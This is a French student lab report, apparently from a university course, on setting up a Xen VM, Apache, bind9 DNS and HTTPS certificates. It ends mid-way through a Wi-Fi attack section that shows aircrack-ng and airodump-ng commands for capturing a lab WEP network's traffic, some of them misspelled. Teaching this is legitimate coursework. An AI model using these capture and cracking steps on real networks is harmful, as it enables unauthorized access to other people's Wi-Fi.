Ce qui nous retourne : &lt;br /&gt;
      bridge name	bridge id		STP enabled	interfaces&lt;br /&gt;
      IMA2a5		8000.000af75e3dc0	no		eth1&lt;br /&gt;
      eth2&lt;br /&gt;
      if3.0&lt;br /&gt;
      IMA5sc		8000.000af75e3dc2	no		eth3&lt;br /&gt;
      eth5&lt;br /&gt;
      Insecure		8000.c81f66c22b83	no		vlan6&lt;br /&gt;
      L3MRIT		8000.000af763ae2d	no		eth4&lt;br /&gt;
      StudentsInfo		8000.c81f66c22b83	no		vlan50&lt;br /&gt;
On voit bien l'existence du bridge '''IMA2a5''', il faut donc l'ajouter à notre .cfg qui est le fichier de configuration de la VM ('''/etc/xen/ima2a5-rex4ever.cfg''')&lt;br /&gt;
et on modifie la ligne commençant par '''vif =''' et on ajoute le bridge de la manière suivante : &lt;br /&gt;
      vif = ['MAC:xxxxx,bridge = IMA2a5']&lt;br /&gt;
Après avoir modifié ce fichier, il faut le parser : xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
Une erreur '''NUMA placement failed, performance might be affected''' peut apparaître mais elle indique juste que xen n'arrive pas à disposer les VM comme il veut sur les procs, mais cela n'impactera que les performances nous passons outre ce problème.&lt;br /&gt;
&lt;br /&gt;
=== Démarrer la VM et accès console ===&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl console ima2a5-rex4ever&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). Après nous être logué,on change le mot de passe qui devient le même que le mot de passe du root de '''corduan''' ou d'une zabeth.&lt;br /&gt;
&lt;br /&gt;
=== Montage des répertoires /var et /home ===&lt;br /&gt;
==== Creation des disques logique ====&lt;br /&gt;
Il faut d'abord créer les partitions logiques sur corduan via : &lt;br /&gt;
     lvcreate -L10G -n ima2a5-rex4ever-home virtual&lt;br /&gt;
     lvcreate -L10G -n ima2a5-rex4ever-var virtual&lt;br /&gt;
Il est possible qu'il affiche l'avertissement suivant : '''WARNING: ext2 signature detected on /dev/virtual/ima2a5-rex4ever-home at offset 1080. Wipe it? [y/n]'''&lt;br /&gt;
repondre alors oui(y).&lt;br /&gt;
Il est possible de verifier que votre partition a bien été crée via la commande :&lt;br /&gt;
      lvdisplay&lt;br /&gt;
On obtient alors dans la liste de toutes les partitions, nous deux partitions précedemment créées&lt;br /&gt;
      --- Logical volume ---&lt;br /&gt;
      LV Path                '''/dev/virtual/ima2a5-rex4ever-home'''&lt;br /&gt;
      LV Name                ima2a5-rex4ever-home&lt;br /&gt;
      VG Name                virtual&lt;br /&gt;
      LV UUID                mhJqFx-zO1m-PlOU-Zmeu-8NGx-7UUO-c2g9dP&lt;br /&gt;
      LV Write Access        read/write&lt;br /&gt;
      LV Creation host, time cordouan, 2019-11-08 08:47:26 +0000&lt;br /&gt;
      LV Status              available&lt;br /&gt;
      # open                 0&lt;br /&gt;
      LV Size                10.00 GiB&lt;br /&gt;
      Current LE             2560&lt;br /&gt;
      Segments               1&lt;br /&gt;
      Allocation             inherit&lt;br /&gt;
      Read ahead sectors     auto&lt;br /&gt;
      - currently set to     256&lt;br /&gt;
      Block device           254:3&lt;br /&gt;
     --- Logical volume ---&lt;br /&gt;
     LV Path                '''/dev/virtual/ima2a5-rex4ever-var'''&lt;br /&gt;
     LV Name                ima2a5-rex4ever-var&lt;br /&gt;
     VG Name                virtual&lt;br /&gt;
     LV UUID                9Bnl6S-6CE5-CtO2-hD8f-RidD-sps5-b1mrWg&lt;br /&gt;
     LV Write Access        read/write&lt;br /&gt;
     LV Creation host, time cordouan, 2019-11-08 08:50:57 +0000&lt;br /&gt;
     LV Status              available&lt;br /&gt;
     # open                 0&lt;br /&gt;
     LV Size                10.00 GiB&lt;br /&gt;
     Current LE             2560&lt;br /&gt;
     Segments               1&lt;br /&gt;
     Allocation             inherit&lt;br /&gt;
     Read ahead sectors     auto&lt;br /&gt;
     - currently set to     256&lt;br /&gt;
     Block device           254:4&lt;br /&gt;
Il faut maintenant faire pointer le système de fichier sur nos deux nouveaux repertoires pour finir la création : &lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-home&lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-var&lt;br /&gt;
Nos deux disques sont maintenant prêt, il ne reste plus qu'a les connecter avec la VM. Pour cela, il faut modifier le '''.cfg''' de nouveau.&lt;br /&gt;
&lt;br /&gt;
==== Modification du fichier de configuration ====&lt;br /&gt;
Retournons donc dans le fichier '''/etc/xen/ima2a5-rex4ever.cfg''' et dans la section disk modifier tel que : &lt;br /&gt;
&lt;br /&gt;
     disk    	= [&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/disk.img,xvda2,w',&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/swap.img,xvda1,w',               &lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-home,xvdb1,w',&lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-var,xvdb2,w',&lt;br /&gt;
                  ]&lt;br /&gt;
&lt;br /&gt;
Pour prendre effet il faut redémarrer la VM à l'aide des commandes&lt;br /&gt;
    xl shutdown ima2a5-rex4ever&lt;br /&gt;
    xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
&lt;br /&gt;
==== Configuration pour forcer le montage à chaque démarrage de la VM ====&lt;br /&gt;
Il faut ensuite aller dans la VM dans '''/etc/fstab''' et ajouter &lt;br /&gt;
    /dev/xvdb1		/home		ext4		defaults				0		2&lt;br /&gt;
    #/dev/xvdb2		/var		ext4		defaults				0		2&lt;br /&gt;
&lt;br /&gt;
Ces deux lignes permettent d'assurer que les 2 disques /var et /home soient pris en compte au démarrage de la VM.('''ATTENTION POUR LE MOMENT BIEN LAISSER # DEVANT LA 2eme LIGNE''')&lt;br /&gt;
Relancer la machine comme précédemment expliqué et testé que le /home fonctionne.&lt;br /&gt;
Pour le /var c'est un peu plus compliqué comme manipulation et il faut faire EXTREMENT attention , une fausse manipulation peut tuer la machine.&lt;br /&gt;
    mount /dev/xvdb2 /mnt&lt;br /&gt;
    rm -rf /mnt/lock&lt;br /&gt;
    rm -rf /mnt/log&lt;br /&gt;
    rm -rf /mnt/run&lt;br /&gt;
    mv /var/* /mnt&lt;br /&gt;
    vi /etc/fstab&lt;br /&gt;
Maintenant decommentez la deuxième ligne que vous aviez ajouté précedemment. Puis il faut lancer la commande :&lt;br /&gt;
    umount /mnt    &lt;br /&gt;
    mount -a&lt;br /&gt;
A l'aide de la commande '''fdisk -l''' depuis la VM, on peut verifier que nos quatres disques sont bien montés.De même avec '''df''' on obtient bien dans la liste les lignes : &lt;br /&gt;
      Filesystem		1K-blocks	Used	Available	Use%	Mounted on&lt;br /&gt;
     udev		75004		0 	75004		0%	/dev&lt;br /&gt;
     tmpfs          	23824		76 	23748		1%	/run&lt;br /&gt;
     /dev/xvda2   	4062912		459920	3376896		12%	/&lt;br /&gt;
     tmpfs           	5120		0  	5120		0%	/run/lock&lt;br /&gt;
     tmpfs         	152500  	0	152500		0%	/run/shm&lt;br /&gt;
     /dev/xvdb1  	10321208	23028   9773892		1%	/home&lt;br /&gt;
     /dev/xvdb2  	10321208	71076   9725844		1%	/var&lt;br /&gt;
La machine est donc prête, on peut passer à l'installation des paquetages linux nécessaires&lt;br /&gt;
=== Mise en place de l'adresse statique ===&lt;br /&gt;
Précedemment nous avions mis l'adresse en DHCP or il est demandé d'avoir une adresse statique (pour notre groupe il s'agit de  ''' 193.48.57.163/28 ''' )&lt;br /&gt;
&lt;br /&gt;
=== Paquetage Linux ===&lt;br /&gt;
Pour commencer, on va tout d'abord mettre le système à jour via : &lt;br /&gt;
    sudo apt-get update&lt;br /&gt;
==== Paquetages nécessaires pour le SSH ====&lt;br /&gt;
'''OpenSSH''' est un ensemble d'outils libres pour établir des communications chiffrées, donc sécurisées, sur un réseau informatique grâce au protocole '''SSH''' (Secure SHell).&lt;br /&gt;
Il chiffre tout le trafic (mots de passe y compris), via une combinaison astucieuse de chiffrement symétrique et asymétrique. '''OpenSSH''' fournit également d'autres méthodes d'authentification alternatives au traditionnel mot de passe.&lt;br /&gt;
Comme son nom l'indique, OpenSSH est développé dans le cadre du projet '''OpenBSD'''.&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Nom de la bibliothèque !! Descriptif !! Commande&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt-get install openssh-client&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt install openssh-server&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, SSH est déjà présent sur la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur Web Apache2 ====&lt;br /&gt;
Le logiciel libre Apache HTTP Server (Apache) est un serveur HTTP créé et maintenu au sein de la fondation Apache. C'est le serveur HTTP le plus populaire du World Wide Web. Il est distribué selon les termes de la licence Apache. &lt;br /&gt;
Pour l'installer, il faut taper la commande : &lt;br /&gt;
    apt install apache2&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur DNS bind ====&lt;br /&gt;
Le service DNS (Domain Name System) est un service TCP/IP permettant la correspondance entre un nom de domaine qualifié (FQDN : Fully Qualified Domain Name) et une adresse IP. Ainsi, grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP.Un serveur qui héberge le service DNS est appelé &amp;quot;serveur de noms&amp;quot;. Ubuntu est livré par défaut avec BIND (Berkley Internet Naming Daemon), le serveur DNS le plus utilisé sur Internet. Pour installer bind9 :&lt;br /&gt;
    apt install bind9&lt;br /&gt;
	&lt;br /&gt;
== Le Site Web : HTTP ==&lt;br /&gt;
=== Achat d'un nom de domaine ===&lt;br /&gt;
Pour la réalisation de ce TP, nous avons dû acheter un nom de domaine via le site [https://www.gandi.net/fr Gandi.net] . On retiendra que notre nom de domaine est : [https://www.ima2a5-rex4ever.site rex4ever.site].&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage apache2 ===&lt;br /&gt;
Après avoir installé Apache2 sur la machine ( [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA2a5_2019/2020_G3#Paquetages_n.C3.A9cessaires_pour_le_serveur_Web_Apache2 voir ici]), il faut le paramétrer correctement (je me suis servi de [https://doc.ubuntu-fr.org/apache2 ce site]).Pour cela, on commence configurer le '''.conf''' Pour cela, on le crée via la commande '''nano /etc/sites-available/ima2a5-rex4ever.site.conf''' et on renseigne alors dans le fichier les détails suivants :&lt;br /&gt;
    &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
        ServerName ima2a5-rex4ever.site&lt;br /&gt;
        ServerAlias www.ima2a5-rex4ever.site&lt;br /&gt;
        DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
        &amp;lt;Directory &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&amp;gt;&lt;br /&gt;
                Options +FollowSymLinks&lt;br /&gt;
                AllowOverride all&lt;br /&gt;
                Require all granted&lt;br /&gt;
        &amp;lt;/Directory&amp;gt;&lt;br /&gt;
        ErrorLog /var/log/apache2/error.ima2a5-rex4ever.site.log&lt;br /&gt;
        CustomLog /var/log/apache2/access.ima2a5-rex4ever.site.com.log combined&lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
Maintenant qu'il est configuré, on peut déployer le site via : &lt;br /&gt;
    a2ensite ima2a5-rex4ever.site&lt;br /&gt;
Puis, on recharge la configuration de l'utilitaire Apache 2 :&lt;br /&gt;
    service apache2 reload&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage du DNS ===&lt;br /&gt;
Le DNS (Domain Name Server) est un serveur qui permet de rattacher un nom à une IP et ainsi c'est lui qui permet de faire le lien entre le nom d'un site et son contenu&lt;br /&gt;
==== Glue Records sur Gandi ====&lt;br /&gt;
Le Glue Record permet de créer des alias et ainsi de lier des IP et à des noms.C'est fort pratique pour simplifier la configuration.Pour se faire il faut se rendre dans Domain , cliquer sur le nom de notre site , aller dans l'onglet Glue Records et cliquer sur ADD&lt;br /&gt;
   name : dns.ima2a5-rex4ever.site&lt;br /&gt;
   ip adresse(s) : 193.48.57.163&lt;br /&gt;
==== Affecter le DNS du coté de Gandi.net ====&lt;br /&gt;
Par défaut, les serveurs de noms (DNS) sont 3 serveurs de DNS Live Gandi, il faut ajouter les serveurs externes :&lt;br /&gt;
*ns6.gandi.net  '''217.70.177.40'''&lt;br /&gt;
*dns.ima2a5-rex4ever.site   '''193.48.57.163'''&lt;br /&gt;
'''Note:''' il faut compter 12 à 24 heures pour la propagation sur Internet.&lt;br /&gt;
==== Le paramétrage de bind9 ====&lt;br /&gt;
Le paramétrage repose sur la configuration de ses 3 fichiers :&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.options =====&lt;br /&gt;
Ce fichier permet de gérer les DNS authorisés (de manière générale) à récuperer des informations de notre site. On le modifie pour permettre au dns de gandi de récuperer les données :&lt;br /&gt;
&lt;br /&gt;
     options {&lt;br /&gt;
     &lt;br /&gt;
         // forwarders {&lt;br /&gt;
         //     0.0.0.0;&lt;br /&gt;
         // };&lt;br /&gt;
         // dnssec-validation auto;&lt;br /&gt;
         auth-nxdomain no;    # conform to RFC1035&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         '''allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };'''&lt;br /&gt;
     };&lt;br /&gt;
     &lt;br /&gt;
     '''acl &amp;quot;allowed_to_transfer&amp;quot; {'''&lt;br /&gt;
        ''' 217.70.177.40/32; // adresse IP du dns6.gandi.net'''&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.local =====&lt;br /&gt;
Il faut maintenant déclarer à Bind9 le nom de notre fichier de configuration de DNS sous forme de zone , on le fait via ce fichier. On lui renseigne la zone : &lt;br /&gt;
    &lt;br /&gt;
     zone &amp;quot;ima2a5-rex4ever.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.ima2a5-rex4ever.site&amp;quot;;&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== le fichier /etc/bind/db.ima2a5-rex4ever.site=====&lt;br /&gt;
Enfin, il faut créer le fichier de configuration précedemment appelé : &lt;br /&gt;
&lt;br /&gt;
   ;&lt;br /&gt;
   ; BIND data file for local loopback interface&lt;br /&gt;
   ;&lt;br /&gt;
   $TTL    604800&lt;br /&gt;
   @       IN      SOA     dns.ima2a5-rex4ever.site. root@ima2a5-rex4ever.site. (  &amp;lt;= METTRE UNE ADRESSE BIDON , pas necessaire&lt;br /&gt;
                           21112019        ; Serial&lt;br /&gt;
                            604800         ; Refresh&lt;br /&gt;
                             86400         ; Retry&lt;br /&gt;
                           2419200         ; Expire&lt;br /&gt;
                            604800 )       ; Negative Cache TTL&lt;br /&gt;
   ;&lt;br /&gt;
   @       IN      NS      dns.ima2a5-rex4ever.site.  &amp;lt;= DN du site &lt;br /&gt;
   @       IN      NS      ns6.gandi.net.&amp;lt;= DNS de gandi&lt;br /&gt;
   dns     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE DNS&lt;br /&gt;
   www     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE SITE&lt;br /&gt;
&lt;br /&gt;
Après 5 minutes de cuisson et avoir relancé bind9, c'est prêt le site en http est accessible et visualisable! On peut acceder au site internet http://www.ima2a5-rex4ever.site !&lt;br /&gt;
&lt;br /&gt;
== Le Site Web : HTTPS ==&lt;br /&gt;
Le SSL (Secure Socket Layer) / TLS (Transport Layer Security) est le protocole de sécurité le plus répandu qui créé un canal sécurisé entre deux machines communiquant sur Internet ou un réseau interne. Dans notre société centrée sur un Internet vulnérable, le SSL est généralement utilisé lorsqu'un navigateur doit se connecter de manière sécurisée à un serveur web.&lt;br /&gt;
&lt;br /&gt;
=== Generation d'un certificat ===&lt;br /&gt;
&lt;br /&gt;
La première étape pour générer un certificat est de concevoir un jeu de 2 clefs qui sont un '''.key''' et un '''.csr''' &lt;br /&gt;
Pour obtenir ces deux fichiers, nous utilisons l'utilitaire '''OpenSSL'''.&lt;br /&gt;
      openssl req -nodes -newkey rsa:2048 -sha256 -keyout ima2a5-rex4ever.key -out ima2a5-rex4ever.csr &lt;br /&gt;
&lt;br /&gt;
'''Mais alors comment marche cette commande?'''&lt;br /&gt;
Après avoir lu le descriptif que l'on peut obtenir via [http://www.delafond.org/traducmanfr/man/man1/openssl.1.html man openssl], il en ressort que les arguments sont :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Argument !! explication&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|req&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Gestion X.509 Certificate Signing Request (CSR). &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-nodes&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Pas de chiffrage sur la clef privée (option arbitraire no des)&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-newkey rsa:2048&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|demande de Génération d'une paire de clef RSA de 2048 bits et d'une demande de certificat.&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-keyout ima2a5-rex4ever.key&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre .key&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-out ima2a5-rex4ever.csr &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre demande de certificat .csr&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
Pour générer en bon éduforme notre demande,l'utilitaire a besoin des informations, voici ce que nous avons répondu:&lt;br /&gt;
&lt;br /&gt;
      Country Name (2 letter code) [AU]:'''FR'''&lt;br /&gt;
      State or Province Name (full name) [Some-State]:'''Nord'''&lt;br /&gt;
      Locality Name (eg, city) []:'''Lille'''&lt;br /&gt;
      Organization Name (eg, company) [Internet Widgits Pty Ltd]:'''Polytech Lille'''&lt;br /&gt;
      Organizational Unit Name (eg, section) []:'''IMA2A5'''&lt;br /&gt;
      Common Name (e.g. server FQDN or YOUR name) []:'''ima2a5-rex4ever.site'''&lt;br /&gt;
      Email Address []:'''pascal.coint@polytech-lille.net'''&lt;br /&gt;
      &lt;br /&gt;
      Please enter the following 'extra' attributes&lt;br /&gt;
      to be sent with your certificate request&lt;br /&gt;
      A challenge password []:'''glopglop!'''&lt;br /&gt;
      Optionnal informations :&lt;br /&gt;
&lt;br /&gt;
==== Affectation du certificat sur Gandi.net ====&lt;br /&gt;
Après avoir répondu , il génère alors 2 fichiers. Le '''.key''' est notre clef privée elle restera donc en notre unique possession. On partage avec gandhi (qui est également un générateur de certificat) notre '''.csr'''. Il va donc étudier la validité de notre domaine et le certifier ou non.&lt;br /&gt;
&lt;br /&gt;
''' Contenu de notre CSR'''&lt;br /&gt;
      -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
      MIIDBTCCAe0CAQAwgaUxCzAJBgNVBAYTAkZSMQ0wCwYDVQQIDAROb3JkMQ4wDAYD&lt;br /&gt;
      VQQHDAVMaWxsZTEXMBUGA1UECgwOUG9seXRlY2ggTGlsbGUxDzANBgNVBAsMBklN&lt;br /&gt;
      QTJBNTEdMBsGA1UEAwwUaW1hMmE1LXJleDRldmVyLnNpdGUxLjAsBgkqhkiG9w0B&lt;br /&gt;
      CQEWH3Bhc2NhbC5jb2ludEBwb2x5dGVjaC1saWxsZS5uZXQwggEiMA0GCSqGSIb3 &lt;br /&gt;
      DQEBAQUAA4IBDwAwggEKAoIBAQDBKS9p8572UiXo2W1dAiKEKLq+B6ge/si0AhMH&lt;br /&gt;
      fLtovMz7Xvy/9oQnq25SvkWaNRuAJrvzROGS2mzkG9IEhnEpWSTNvspTO60PgNPo&lt;br /&gt;
      EUYcgKAeEuVVJyom3K3ioBOvllucQfiOIB/ykvP80s+9Wjo2vf2PkESPTjfM0zKP&lt;br /&gt;
      2JMT9cGQV6auD7NU+Ygz7w5dW/NKkU2KZA9HQ7i95+/ST3r2T0D8xP/ltEBC0Q7i&lt;br /&gt;
      U/OVkAKn6CPJ6KtkbQYvgKVG95IM5SQb/WxRVNnHKS4f+erNFYpx5iNiHhv6larV&lt;br /&gt;
      G0oR9uNsg7tOhdhcVVnooGSAsoxtgmDLwzuuho+3fS4t1K83AgMBAAGgGjAYBgkq&lt;br /&gt;
      hkiG9w0BCQcxCwwJZ2xvcGdsb3AhMA0GCSqGSIb3DQEBCwUAA4IBAQB7jtWizvBQ&lt;br /&gt;
      dNEyyVRhS563mKFo34RWW4g5tpnPC6wepQ7tvHo6gZZtzljobsWF55lRK7/Pi8eh&lt;br /&gt;
      ANyQxb1Lo9FcHJcUOEMc8heeutSZQoCslTdRNMe+uBhQ/qCLXjy+fgdptqPi9cXP&lt;br /&gt;
      zi8gBbrAQ9sHqJPK/RwhzuhCkBSzYgoNbYLjrHf8lCe60+7+0HBKM3jpTUDmzrzg&lt;br /&gt;
      Kmb8GmkgcrzKSNhlOFZpiQqBJUfK5zJEucdhJ0j7Tupwf+J2oO+TccnCNH7o1Ykc&lt;br /&gt;
      7ANKYKpf8AoCcZenLutCXt3YGjT8INuh5SnpsyR3BZUK9hNzZGK9Ilv9hwiEnmaS&lt;br /&gt;
      PQWRkLUGQdh+&lt;br /&gt;
      -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Puis, Gandi.net va demander une méthode de vérification sur le serveur web cible afin de savoir s'il s'agit bien de notre serveur.Il existe trois possibilités:&lt;br /&gt;
*Par verification DNS&lt;br /&gt;
*Par Mail&lt;br /&gt;
*Par fichier&lt;br /&gt;
Nous avons choisi la méthode par fichier, certes un peu longue mais ne nécessitant pas l'intervention de Monsieur Redon.&lt;br /&gt;
On copie ainsi un fichier temporaire à l'endroit indiqué par gandi et on attend que gandi valide la demande.&lt;br /&gt;
Après une verification de la part de Gandi (qui nécessite plusieurs dizaines de minutes), on obtient un certificat ('''.csr''') et le certificat intermédiaire ('''.pem''')&lt;br /&gt;
Ils sont nécessaires pour la configuration du site en HTTPS.&lt;br /&gt;
&lt;br /&gt;
=== S'assurer qu'Apache écoute le port 443 (protocole https) ===&lt;br /&gt;
On sait que le protocole HTTPS se sert du port 443 pour communiquer , verifions alors que c'est bien le cas : &lt;br /&gt;
    root@ima2a5-rex4ever:/etc/apache2# netstat -tanpu |grep &amp;quot;LISTEN&amp;quot; |grep &amp;quot;443&amp;quot;&lt;br /&gt;
    tcp6       0      0 :::443                  :::*                    LISTEN      10706/apache2&lt;br /&gt;
Le résultat indique en effet que le port 443 est ecouté par apache2, ce qui signifie qu'il ne faut pas faire de configuration supplémentaire.&lt;br /&gt;
&lt;br /&gt;
=== Activation du protocole SSL ===&lt;br /&gt;
Il faut activer le module qui gère le protocole SSL via la commande : &lt;br /&gt;
   a2enmode ssl&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
=== Configuration du VirtualHost Apache pour le protocole HTTPS ===&lt;br /&gt;
Afin de ne pas saboter la configuration HTTP déjà en place, on va dupliquer la configuration disponible dans /sites-available:&lt;br /&gt;
    cp ima2a5-rex4ever.site.conf ima2a5-rex4ever.site-ssl.conf&lt;br /&gt;
Modification :&lt;br /&gt;
   &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
  #   General setup for the virtual host&lt;br /&gt;
     DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
     ServerName ima2a5-rex4ever.site:443                                                                                                                                                                                                          ServerAdmin pascal.coint@polytech-lille.net                                                                                                                                                                                                  ErrorLog &amp;quot;/usr/local/apache2/logs/error_log&amp;quot;                                                                                                                                                                                                 TransferLog &amp;quot;/usr/local/apache2/logs/access_log&amp;quot;                                                                                                                                                                                          # Activation du SSL                                                                                                                                                                                                                                SSLEngine On&lt;br /&gt;
    &lt;br /&gt;
    # Activation de tous les protocoles sécurisés (TLS v1.0, v1.1 et TLS v1.2) touut en désactivant les protocoles non sécurisés (SSL v2, SSL v3)&lt;br /&gt;
    SSLProtocol All -SSLv3 -SSLv2&lt;br /&gt;
    # Le navigateur devra choisir une méthode de chiffrement en respectant l'ordre indiquée dans SSLCipherSuite&lt;br /&gt;
    SSLHonorCipherOrder on&lt;br /&gt;
    &lt;br /&gt;
    # Chemin vers le certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.cer&amp;quot;&lt;br /&gt;
    SSLCACertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.pem&amp;quot;&lt;br /&gt;
    # Chemin vers la clée privée du certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateKeyFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.key&amp;quot;    &lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
On peut maintenant permuter les fichiers .conf et renommer notre ancien .conf en &amp;quot;ima2a5-rex4ever.site-http.conf&amp;quot;&lt;br /&gt;
'''Note :''' Comme vous aurez pu le remarquer, j'ai créer un dossier certificate dans lequel j'ai mis le .cer,le .csr,le.key et le .pem afin de ne pas les perdre.&lt;br /&gt;
On va ensuite décharger puis recharger le site :&lt;br /&gt;
   a2dissite ima2a5-rex4ever.site&lt;br /&gt;
   a2ensite ima2a5-rex4ever.site&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
Ensuite on va regarder quels sont nos sites actifs à l'aide de apache2ctl -S , ce qui retourne :&lt;br /&gt;
    *:80                   ima2a5-rex4ever.site (/etc/apache2/sites-enabled/000-default.conf:1)&lt;br /&gt;
    *:443                  ima2a5-rex4ever.site (/etc/apache2/sites-enabled/ima2a5-rex4ever.site.conf:13)&lt;br /&gt;
Le site est prêt pour le HTTPS&lt;br /&gt;
&lt;br /&gt;
=== Securisation du DNS : Le DNSSEC ===&lt;br /&gt;
Avoir un site sécurisé c'est bien , avoir toute la chaine de transmission pour éviter les fraude c'est encore mieux. Pour cela, il est possible de concevoir un DNSSEC (contraction de DNS SECURISED)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Attaque d'une installation Wi-fi ==&lt;br /&gt;
=== Description ===&lt;br /&gt;
Notre Client Wi-fi est un ordinateur portable fourni par Monsieur Redon. Il ne nécessite pas nécessairement de configuration. Cependant, la clef Wi-Fi fournie avec elle doit être paramétrée (la datasheet peut se trouver à l'adresse suivant ; [https://www.farnell.com/datasheets/1669935.pdf Datasheet]). De plus, il faut installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA&lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il suffit de taper la commande :&lt;br /&gt;
    apt-get install aircrack-ng&lt;br /&gt;
'''Note:''' il faut auparavant configurer le réseau pour se connecter à internet.&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de '''airmon-ng''' qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
   airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
   airmong-ng start NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
   airodump-ng --encrypt wep NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis à l'aide d'un second terminal, on peut stocker les informations volées dans un .txt :&lt;br /&gt;
   Airodump-ng FICHIER.txt -c 2 --bssid ADDRESSBSSID NOMRESEAUESPIONNABLE&lt;br /&gt;
Ce qui donne dans notre cas : &lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wep wlan0mon &lt;br /&gt;
   Airodump-ng -w reseau_1.txt -c 2 --bssid 04:DA:D2:50:53 wlan0mon   (&amp;lt;== pour le réseau cracotte 3)&lt;br /&gt;
&lt;br /&gt;
